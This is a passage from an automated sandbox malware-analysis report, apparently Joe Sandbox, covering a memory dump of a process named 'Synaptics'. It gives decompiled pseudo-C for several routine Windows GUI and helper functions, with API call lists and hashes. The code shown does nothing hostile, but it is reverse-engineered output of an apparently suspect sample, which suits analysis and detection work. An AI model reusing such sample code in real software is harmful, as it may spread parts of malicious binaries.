                                                                                                                                                                                                                            • WindowFromPoint.USER32(?,?), ref: 0045873C
                                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0045874A
                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00458751
                                                                                                                                                                                                                            • SendMessageA.USER32(00000000,00000084,00000000,00000000), ref: 0045876A
                                                                                                                                                                                                                            • SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 00458781
                                                                                                                                                                                                                            • SetCursor.USER32(00000000), ref: 00458793
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1770779139-0
                                                                                                                                                                                                                            • Opcode ID: f6131d98ef82387943452fed01ddfa8e7454534d6ded7eca32afc254d13770e1
                                                                                                                                                                                                                            • Instruction ID: 0e129d7b8b93cd0c48e49d674e41586019fec875b1cb266d62cfcabba037c031
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f6131d98ef82387943452fed01ddfa8e7454534d6ded7eca32afc254d13770e1
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D501AC2660830425E62036754C87F7F2558DF85B65F14453FBA04762C3ED3DAC05936E
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00454268 Relevance: 9.2, APIs: 6, Instructions: 150COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 89%
                                                                                                                                                                                                                            			E00454268(intOrPtr* __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr* _v12;
				struct HDC__* _v16;
				struct tagPAINTSTRUCT _v80;
				struct tagRECT _v96;
				struct tagRECT _v112;
				signed int _v116;
				long _v120;
				void* __ebp;
				void* _t68;
				void* _t94;
				struct HBRUSH__* _t97;
				intOrPtr _t105;
				void* _t118;
				void* _t127;
				intOrPtr _t140;
				intOrPtr _t146;
				void* _t147;
				void* _t148;
				void* _t150;
				void* _t152;
				intOrPtr _t153;

				_t148 = __esi;
				_t147 = __edi;
				_t138 = __edx;
				_t127 = __ebx;
				_t150 = _t152;
				_t153 = _t152 + 0xffffff8c;
				_v12 = __edx;
				_v8 = __eax;
				_t68 =  *_v12 - 0xf;
				if(_t68 == 0) {
					_v16 =  *(_v12 + 4);
					if(_v16 == 0) {
						 *(_v12 + 4) = BeginPaint( *(_v8 + 0x254),  &_v80);
					}
					_push(_t150);
					_push(0x454436);
					_push( *[fs:eax]);
					 *[fs:eax] = _t153;
					if(_v16 == 0) {
						GetWindowRect( *(_v8 + 0x254),  &_v96);
						E0043AAC0(_v8,  &_v120,  &_v96);
						_v96.left = _v120;
						_v96.top = _v116;
						E004398B8( *(_v12 + 4),  ~(_v96.top),  ~(_v96.left));
					}
					E0043F3B8(_v8, _t127, _v12, _t147, _t148);
					_pop(_t140);
					 *[fs:eax] = _t140;
					_push(0x454444);
					if(_v16 == 0) {
						return EndPaint( *(_v8 + 0x254),  &_v80);
					}
					return 0;
				} else {
					_t94 = _t68 - 5;
					if(_t94 == 0) {
						_t97 = E00425610( *((intOrPtr*)(_v8 + 0x170)));
						 *((intOrPtr*)( *_v8 + 0x44))();
						FillRect( *(_v12 + 4),  &_v112, _t97);
						if( *((char*)(_v8 + 0x22f)) == 2 &&  *(_v8 + 0x254) != 0) {
							GetClientRect( *(_v8 + 0x254),  &_v96);
							FillRect( *(_v12 + 4),  &_v96, E00425610( *((intOrPtr*)(_v8 + 0x170))));
						}
						_t105 = _v12;
						 *((intOrPtr*)(_t105 + 0xc)) = 1;
					} else {
						_t118 = _t94 - 0x2b;
						if(_t118 == 0) {
							E004541DC(_t150);
							_t105 = _v8;
							if( *((char*)(_t105 + 0x22f)) == 2) {
								if(E00454704(_v8) == 0 || E00454228(_t138, _t150) == 0) {
									_t146 = 1;
								} else {
									_t146 = 0;
								}
								_t105 = E0045152C( *(_v8 + 0x254), _t146);
							}
						} else {
							if(_t118 != 0x45) {
								_t105 = E004541DC(_t150);
							} else {
								E004541DC(_t150);
								_t105 = _v12;
								if( *((intOrPtr*)(_t105 + 0xc)) == 1) {
									_t105 = _v12;
									 *((intOrPtr*)(_t105 + 0xc)) = 0xffffffff;
								}
							}
						}
					}
					return _t105;
				}
			}

























                                                                                                                                                                                                                            0x00454268
                                                                                                                                                                                                                            0x00454268
                                                                                                                                                                                                                            0x00454268
                                                                                                                                                                                                                            0x00454268
                                                                                                                                                                                                                            0x00454269
                                                                                                                                                                                                                            0x0045426b
                                                                                                                                                                                                                            0x0045426e
                                                                                                                                                                                                                            0x00454271
                                                                                                                                                                                                                            0x00454279
                                                                                                                                                                                                                            0x0045427c
                                                                                                                                                                                                                            0x0045438c
                                                                                                                                                                                                                            0x00454393
                                                                                                                                                                                                                            0x004543ab
                                                                                                                                                                                                                            0x004543ab
                                                                                                                                                                                                                            0x004543b0
                                                                                                                                                                                                                            0x004543b1
                                                                                                                                                                                                                            0x004543b6
                                                                                                                                                                                                                            0x004543b9
                                                                                                                                                                                                                            0x004543c0
                                                                                                                                                                                                                            0x004543d0
                                                                                                                                                                                                                            0x004543de
                                                                                                                                                                                                                            0x004543e6
                                                                                                                                                                                                                            0x004543ec
                                                                                                                                                                                                                            0x004543ff
                                                                                                                                                                                                                            0x004543ff
                                                                                                                                                                                                                            0x0045440a
                                                                                                                                                                                                                            0x00454411
                                                                                                                                                                                                                            0x00454414
                                                                                                                                                                                                                            0x00454417
                                                                                                                                                                                                                            0x00454420
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00454430
                                                                                                                                                                                                                            0x00454435
                                                                                                                                                                                                                            0x00454282
                                                                                                                                                                                                                            0x00454282
                                                                                                                                                                                                                            0x00454285
                                                                                                                                                                                                                            0x004542c5
                                                                                                                                                                                                                            0x004542d3
                                                                                                                                                                                                                            0x004542e1
                                                                                                                                                                                                                            0x004542f0
                                                                                                                                                                                                                            0x0045430c
                                                                                                                                                                                                                            0x0045432b
                                                                                                                                                                                                                            0x0045432b
                                                                                                                                                                                                                            0x00454330
                                                                                                                                                                                                                            0x00454333
                                                                                                                                                                                                                            0x00454287
                                                                                                                                                                                                                            0x00454287
                                                                                                                                                                                                                            0x0045428a
                                                                                                                                                                                                                            0x00454340
                                                                                                                                                                                                                            0x00454346
                                                                                                                                                                                                                            0x00454350
                                                                                                                                                                                                                            0x00454360
                                                                                                                                                                                                                            0x00454371
                                                                                                                                                                                                                            0x0045436d
                                                                                                                                                                                                                            0x0045436d
                                                                                                                                                                                                                            0x0045436d
                                                                                                                                                                                                                            0x0045437c
                                                                                                                                                                                                                            0x0045437c
                                                                                                                                                                                                                            0x00454290
                                                                                                                                                                                                                            0x00454293
                                                                                                                                                                                                                            0x0045443e
                                                                                                                                                                                                                            0x00454299
                                                                                                                                                                                                                            0x0045429a
                                                                                                                                                                                                                            0x004542a0
                                                                                                                                                                                                                            0x004542a7
                                                                                                                                                                                                                            0x004542ad
                                                                                                                                                                                                                            0x004542b0
                                                                                                                                                                                                                            0x004542b0
                                                                                                                                                                                                                            0x004542a7
                                                                                                                                                                                                                            0x00454293
                                                                                                                                                                                                                            0x0045428a
                                                                                                                                                                                                                            0x00454447
                                                                                                                                                                                                                            0x00454447

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Rect$FillPaintWindow$BeginCallClientProc
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 901200654-0
                                                                                                                                                                                                                            • Opcode ID: db1127329ec35ba9265e92a3e95e97328d9cbd62d8671ac9278e586872d5c922
                                                                                                                                                                                                                            • Instruction ID: 131b90634cb33abbaab8d9433d3d521d828b3d7b247f4d7e968007ff8c91c40e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: db1127329ec35ba9265e92a3e95e97328d9cbd62d8671ac9278e586872d5c922
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4651F075E04108EFCB00DB99C549E9DB7F8AB49319F5485A6E808EB352D738AE85DB08
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00410B94 Relevance: 9.1, APIs: 6, Instructions: 139COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 77%
                                                                                                                                                                                                                            			E00410B94(short* __eax, intOrPtr __ecx, intOrPtr* __edx) {
				char _v260;
				char _v768;
				char _v772;
				short* _v776;
				intOrPtr _v780;
				char _v784;
				signed int _v788;
				signed short* _v792;
				char _v796;
				char _v800;
				intOrPtr* _v804;
				void* __ebp;
				signed char _t47;
				signed int _t54;
				void* _t62;
				intOrPtr* _t73;
				intOrPtr* _t91;
				void* _t93;
				void* _t95;
				void* _t98;
				void* _t99;
				intOrPtr* _t108;
				void* _t112;
				intOrPtr _t113;
				char* _t114;
				void* _t115;

				_t100 = __ecx;
				_v780 = __ecx;
				_t91 = __edx;
				_v776 = __eax;
				if(( *(__edx + 1) & 0x00000020) == 0) {
					E00410638(0x80070057);
				}
				_t47 =  *_t91;
				if((_t47 & 0x00000fff) != 0xc) {
					_push(_t91);
					_push(_v776);
					L0040F328();
					return E00410638(_v776);
				} else {
					if((_t47 & 0x00000040) == 0) {
						_v792 =  *((intOrPtr*)(_t91 + 8));
					} else {
						_v792 =  *((intOrPtr*)( *((intOrPtr*)(_t91 + 8))));
					}
					_v788 =  *_v792 & 0x0000ffff;
					_t93 = _v788 - 1;
					if(_t93 < 0) {
						L9:
						_push( &_v772);
						_t54 = _v788;
						_push(_t54);
						_push(0xc);
						L0040F784();
						_t113 = _t54;
						if(_t113 == 0) {
							E00410390(_t100);
						}
						E004109E8(_v776);
						 *_v776 = 0x200c;
						 *((intOrPtr*)(_v776 + 8)) = _t113;
						_t95 = _v788 - 1;
						if(_t95 < 0) {
							L14:
							_t97 = _v788 - 1;
							if(E00410B08(_v788 - 1, _t115) != 0) {
								L0040F79C();
								E00410638(_v792);
								L0040F79C();
								E00410638( &_v260);
								_v780(_t113,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
							}
							_t62 = E00410B38(_t97, _t115);
						} else {
							_t98 = _t95 + 1;
							_t73 =  &_v768;
							_t108 =  &_v260;
							do {
								 *_t108 =  *_t73;
								_t108 = _t108 + 4;
								_t73 = _t73 + 8;
								_t98 = _t98 - 1;
							} while (_t98 != 0);
							do {
								goto L14;
							} while (_t62 != 0);
							return _t62;
						}
					} else {
						_t99 = _t93 + 1;
						_t112 = 0;
						_t114 =  &_v772;
						do {
							_v804 = _t114;
							_push(_v804 + 4);
							_t18 = _t112 + 1; // 0x1
							_push(_v792);
							L0040F78C();
							E00410638(_v792);
							_push( &_v784);
							_t21 = _t112 + 1; // 0x1
							_push(_v792);
							L0040F794();
							E00410638(_v792);
							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
							_t112 = _t112 + 1;
							_t114 = _t114 + 8;
							_t99 = _t99 - 1;
						} while (_t99 != 0);
						goto L9;
					}
				}
			}





























                                                                                                                                                                                                                            0x00410b94
                                                                                                                                                                                                                            0x00410ba0
                                                                                                                                                                                                                            0x00410ba6
                                                                                                                                                                                                                            0x00410ba8
                                                                                                                                                                                                                            0x00410bb2
                                                                                                                                                                                                                            0x00410bb9
                                                                                                                                                                                                                            0x00410bb9
                                                                                                                                                                                                                            0x00410bbe
                                                                                                                                                                                                                            0x00410bcc
                                                                                                                                                                                                                            0x00410d45
                                                                                                                                                                                                                            0x00410d4c
                                                                                                                                                                                                                            0x00410d4d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00410bd2
                                                                                                                                                                                                                            0x00410bd5
                                                                                                                                                                                                                            0x00410be7
                                                                                                                                                                                                                            0x00410bd7
                                                                                                                                                                                                                            0x00410bdc
                                                                                                                                                                                                                            0x00410bdc
                                                                                                                                                                                                                            0x00410bf6
                                                                                                                                                                                                                            0x00410c02
                                                                                                                                                                                                                            0x00410c05
                                                                                                                                                                                                                            0x00410c72
                                                                                                                                                                                                                            0x00410c78
                                                                                                                                                                                                                            0x00410c79
                                                                                                                                                                                                                            0x00410c7f
                                                                                                                                                                                                                            0x00410c80
                                                                                                                                                                                                                            0x00410c82
                                                                                                                                                                                                                            0x00410c87
                                                                                                                                                                                                                            0x00410c8b
                                                                                                                                                                                                                            0x00410c8d
                                                                                                                                                                                                                            0x00410c8d
                                                                                                                                                                                                                            0x00410c98
                                                                                                                                                                                                                            0x00410ca3
                                                                                                                                                                                                                            0x00410cae
                                                                                                                                                                                                                            0x00410cb7
                                                                                                                                                                                                                            0x00410cba
                                                                                                                                                                                                                            0x00410cd6
                                                                                                                                                                                                                            0x00410cdd
                                                                                                                                                                                                                            0x00410ce8
                                                                                                                                                                                                                            0x00410cff
                                                                                                                                                                                                                            0x00410d04
                                                                                                                                                                                                                            0x00410d18
                                                                                                                                                                                                                            0x00410d1d
                                                                                                                                                                                                                            0x00410d30
                                                                                                                                                                                                                            0x00410d30
                                                                                                                                                                                                                            0x00410d39
                                                                                                                                                                                                                            0x00410cbc
                                                                                                                                                                                                                            0x00410cbc
                                                                                                                                                                                                                            0x00410cbd
                                                                                                                                                                                                                            0x00410cc3
                                                                                                                                                                                                                            0x00410cc9
                                                                                                                                                                                                                            0x00410ccb
                                                                                                                                                                                                                            0x00410ccd
                                                                                                                                                                                                                            0x00410cd0
                                                                                                                                                                                                                            0x00410cd3
                                                                                                                                                                                                                            0x00410cd3
                                                                                                                                                                                                                            0x00410cd6
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00410cd6
                                                                                                                                                                                                                            0x00410c07
                                                                                                                                                                                                                            0x00410c07
                                                                                                                                                                                                                            0x00410c08
                                                                                                                                                                                                                            0x00410c0a
                                                                                                                                                                                                                            0x00410c10
                                                                                                                                                                                                                            0x00410c12
                                                                                                                                                                                                                            0x00410c21
                                                                                                                                                                                                                            0x00410c22
                                                                                                                                                                                                                            0x00410c2c
                                                                                                                                                                                                                            0x00410c2d
                                                                                                                                                                                                                            0x00410c32
                                                                                                                                                                                                                            0x00410c3d
                                                                                                                                                                                                                            0x00410c3e
                                                                                                                                                                                                                            0x00410c48
                                                                                                                                                                                                                            0x00410c49
                                                                                                                                                                                                                            0x00410c4e
                                                                                                                                                                                                                            0x00410c69
                                                                                                                                                                                                                            0x00410c6b
                                                                                                                                                                                                                            0x00410c6c
                                                                                                                                                                                                                            0x00410c6f
                                                                                                                                                                                                                            0x00410c6f
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00410c10
                                                                                                                                                                                                                            0x00410c05

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 00410C2D
                                                                                                                                                                                                                            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 00410C49
                                                                                                                                                                                                                            • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 00410C82
                                                                                                                                                                                                                            • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 00410CFF
                                                                                                                                                                                                                            • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 00410D18
                                                                                                                                                                                                                            • VariantCopy.OLEAUT32(?,00000000), ref: 00410D4D
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 351091851-0
                                                                                                                                                                                                                            • Opcode ID: 14f4beccdf032895d207be0bfe30ce8f9fbf525a3445cc88d482939134e69fdd
                                                                                                                                                                                                                            • Instruction ID: 003888812708ca8383a4c1960096dd24bca7936a94d77342cebcc1c5295c8c4e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 14f4beccdf032895d207be0bfe30ce8f9fbf525a3445cc88d482939134e69fdd
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7551FE7590121D9FCB66DB59C981BD9B3BCAF4C304F4041EAE508E7202D678AFC58FA5
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00426AA0 Relevance: 9.1, APIs: 6, Instructions: 84COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 68%
                                                                                                                                                                                                                            			E00426AA0(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, int _a4, signed int* _a8) {
				intOrPtr* _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v32;
				signed short _v44;
				int _t36;
				signed int _t37;
				signed short _t38;
				signed int _t39;
				signed short _t43;
				signed int* _t47;
				signed int _t51;
				intOrPtr _t61;
				void* _t67;
				void* _t68;
				void* _t69;
				intOrPtr _t70;

				_t68 = _t69;
				_t70 = _t69 + 0xffffff90;
				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_t47 = _a8;
				_v24 = _v16 << 4;
				_v20 = E00408D24(_v24, __eflags);
				 *[fs:edx] = _t70;
				_t51 = _v24;
				 *((intOrPtr*)( *_v8 + 0xc))( *[fs:edx], 0x426d97, _t68, __edi, __esi, __ebx, _t67);
				if(( *_t47 | _t47[1]) != 0) {
					_t36 = _a4;
					 *_t36 =  *_t47;
					 *(_t36 + 4) = _t47[1];
				} else {
					 *_a4 = GetSystemMetrics(0xb);
					_t36 = GetSystemMetrics(0xc);
					 *(_a4 + 4) = _t36;
				}
				_push(0);
				L00407638();
				_v44 = _t36;
				if(_v44 == 0) {
					E00425F64(_t51);
				}
				_push(_t68);
				_push(0x426b89);
				_push( *[fs:edx]);
				 *[fs:edx] = _t70;
				_push(0xe);
				_t37 = _v44;
				_push(_t37);
				L00407380();
				_push(0xc);
				_t38 = _v44;
				_push(_t38);
				L00407380();
				_t39 = _t37 * _t38;
				if(_t39 <= 8) {
					__eflags = 1;
					_v32 = 1 << _t39;
				} else {
					_v32 = 0x7fffffff;
				}
				_pop(_t61);
				 *[fs:eax] = _t61;
				_push(0x426b90);
				_t43 = _v44;
				_push(_t43);
				_push(0);
				L00407888();
				return _t43;
			}






















                                                                                                                                                                                                                            0x00426aa1
                                                                                                                                                                                                                            0x00426aa3
                                                                                                                                                                                                                            0x00426aa9
                                                                                                                                                                                                                            0x00426aac
                                                                                                                                                                                                                            0x00426aaf
                                                                                                                                                                                                                            0x00426ab2
                                                                                                                                                                                                                            0x00426abb
                                                                                                                                                                                                                            0x00426ac6
                                                                                                                                                                                                                            0x00426ad4
                                                                                                                                                                                                                            0x00426ada
                                                                                                                                                                                                                            0x00426ae2
                                                                                                                                                                                                                            0x00426aea
                                                                                                                                                                                                                            0x00426b07
                                                                                                                                                                                                                            0x00426b0c
                                                                                                                                                                                                                            0x00426b11
                                                                                                                                                                                                                            0x00426aec
                                                                                                                                                                                                                            0x00426af6
                                                                                                                                                                                                                            0x00426afa
                                                                                                                                                                                                                            0x00426b02
                                                                                                                                                                                                                            0x00426b02
                                                                                                                                                                                                                            0x00426b14
                                                                                                                                                                                                                            0x00426b16
                                                                                                                                                                                                                            0x00426b1b
                                                                                                                                                                                                                            0x00426b22
                                                                                                                                                                                                                            0x00426b24
                                                                                                                                                                                                                            0x00426b24
                                                                                                                                                                                                                            0x00426b2b
                                                                                                                                                                                                                            0x00426b2c
                                                                                                                                                                                                                            0x00426b31
                                                                                                                                                                                                                            0x00426b34
                                                                                                                                                                                                                            0x00426b37
                                                                                                                                                                                                                            0x00426b39
                                                                                                                                                                                                                            0x00426b3c
                                                                                                                                                                                                                            0x00426b3d
                                                                                                                                                                                                                            0x00426b44
                                                                                                                                                                                                                            0x00426b46
                                                                                                                                                                                                                            0x00426b49
                                                                                                                                                                                                                            0x00426b4a
                                                                                                                                                                                                                            0x00426b53
                                                                                                                                                                                                                            0x00426b59
                                                                                                                                                                                                                            0x00426b6b
                                                                                                                                                                                                                            0x00426b6d
                                                                                                                                                                                                                            0x00426b5b
                                                                                                                                                                                                                            0x00426b5b
                                                                                                                                                                                                                            0x00426b5b
                                                                                                                                                                                                                            0x00426b72
                                                                                                                                                                                                                            0x00426b75
                                                                                                                                                                                                                            0x00426b78
                                                                                                                                                                                                                            0x00426b7d
                                                                                                                                                                                                                            0x00426b80
                                                                                                                                                                                                                            0x00426b81
                                                                                                                                                                                                                            0x00426b83
                                                                                                                                                                                                                            0x00426b88

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 00426AEE
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 00426AFA
                                                                                                                                                                                                                            • 73C9AC50.USER32(00000000), ref: 00426B16
                                                                                                                                                                                                                            • 73C9AD70.GDI32(00000000,0000000E,00000000,00426B89,?,00000000), ref: 00426B3D
                                                                                                                                                                                                                            • 73C9AD70.GDI32(00000000,0000000C,00000000,0000000E,00000000,00426B89,?,00000000), ref: 00426B4A
                                                                                                                                                                                                                            • 73C9B380.USER32(00000000,00000000,00426B90,0000000E,00000000,00426B89,?,00000000), ref: 00426B83
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: MetricsSystem$B380
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3145338429-0
                                                                                                                                                                                                                            • Opcode ID: 16b8f12cb14df9c6b7d791b8965e30f23c1242ed487bcd29c7da48a76f1dd96f
                                                                                                                                                                                                                            • Instruction ID: 72199b77af9d5ad6b2438074c355ca19ed48f1e35d4323483afc0bacfeaa441d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 16b8f12cb14df9c6b7d791b8965e30f23c1242ed487bcd29c7da48a76f1dd96f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 90316F74E00214AFEB00EF65C841AAEBBF5FB49750F51856AE814AB394C638A941CB69
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00426F10 Relevance: 9.1, APIs: 6, Instructions: 65COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 45%
                                                                                                                                                                                                                            			E00426F10(struct HBITMAP__* __eax, void* __ebx, struct tagBITMAPINFO* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, void* _a8) {
				char _v5;
				struct HDC__* _v12;
				struct HDC__* _v16;
				struct HDC__* _t29;
				struct tagBITMAPINFO* _t32;
				intOrPtr _t39;
				struct HBITMAP__* _t43;
				void* _t46;

				_t32 = __ecx;
				_t43 = __eax;
				E00426DC0(__eax, _a4, __ecx);
				_v12 = 0;
				_push(0);
				L004072E0();
				_v16 = 0;
				_push(_t46);
				_push(0x426fad);
				_push( *[fs:eax]);
				 *[fs:eax] = _t46 + 0xfffffff4;
				if(__edx != 0) {
					_push(0);
					_push(__edx);
					_t29 = _v16;
					_push(_t29);
					L00407440();
					_v12 = _t29;
					_push(_v16);
					L00407418();
				}
				_v5 = GetDIBits(_v16, _t43, 0, _t32->bmiHeader.biHeight, _a8, _t32, 0) != 0;
				_pop(_t39);
				 *[fs:eax] = _t39;
				_push(0x426fb4);
				if(_v12 != 0) {
					_push(0);
					_push(_v12);
					_push(_v16);
					L00407440();
				}
				return DeleteDC(_v16);
			}











                                                                                                                                                                                                                            0x00426f19
                                                                                                                                                                                                                            0x00426f1d
                                                                                                                                                                                                                            0x00426f26
                                                                                                                                                                                                                            0x00426f2d
                                                                                                                                                                                                                            0x00426f30
                                                                                                                                                                                                                            0x00426f32
                                                                                                                                                                                                                            0x00426f37
                                                                                                                                                                                                                            0x00426f3c
                                                                                                                                                                                                                            0x00426f3d
                                                                                                                                                                                                                            0x00426f42
                                                                                                                                                                                                                            0x00426f45
                                                                                                                                                                                                                            0x00426f4a
                                                                                                                                                                                                                            0x00426f4c
                                                                                                                                                                                                                            0x00426f4e
                                                                                                                                                                                                                            0x00426f4f
                                                                                                                                                                                                                            0x00426f52
                                                                                                                                                                                                                            0x00426f53
                                                                                                                                                                                                                            0x00426f58
                                                                                                                                                                                                                            0x00426f5e
                                                                                                                                                                                                                            0x00426f5f
                                                                                                                                                                                                                            0x00426f5f
                                                                                                                                                                                                                            0x00426f7d
                                                                                                                                                                                                                            0x00426f83
                                                                                                                                                                                                                            0x00426f86
                                                                                                                                                                                                                            0x00426f89
                                                                                                                                                                                                                            0x00426f92
                                                                                                                                                                                                                            0x00426f94
                                                                                                                                                                                                                            0x00426f99
                                                                                                                                                                                                                            0x00426f9d
                                                                                                                                                                                                                            0x00426f9e
                                                                                                                                                                                                                            0x00426f9e
                                                                                                                                                                                                                            0x00426fac

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 00426DC0: GetObjectA.GDI32(?,00000054), ref: 00426DD4
                                                                                                                                                                                                                            • 73C9A590.GDI32(00000000), ref: 00426F32
                                                                                                                                                                                                                            • 73C9B410.GDI32(?,?,00000000,00000000,00426FAD,?,00000000), ref: 00426F53
                                                                                                                                                                                                                            • 73C9B150.GDI32(?,?,?,00000000,00000000,00426FAD,?,00000000), ref: 00426F5F
                                                                                                                                                                                                                            • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 00426F76
                                                                                                                                                                                                                            • 73C9B410.GDI32(?,00000000,00000000,00426FB4,00000000,?,?,?,00000000,00000000,00426FAD,?,00000000), ref: 00426F9E
                                                                                                                                                                                                                            • DeleteDC.GDI32(?), ref: 00426FA7
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
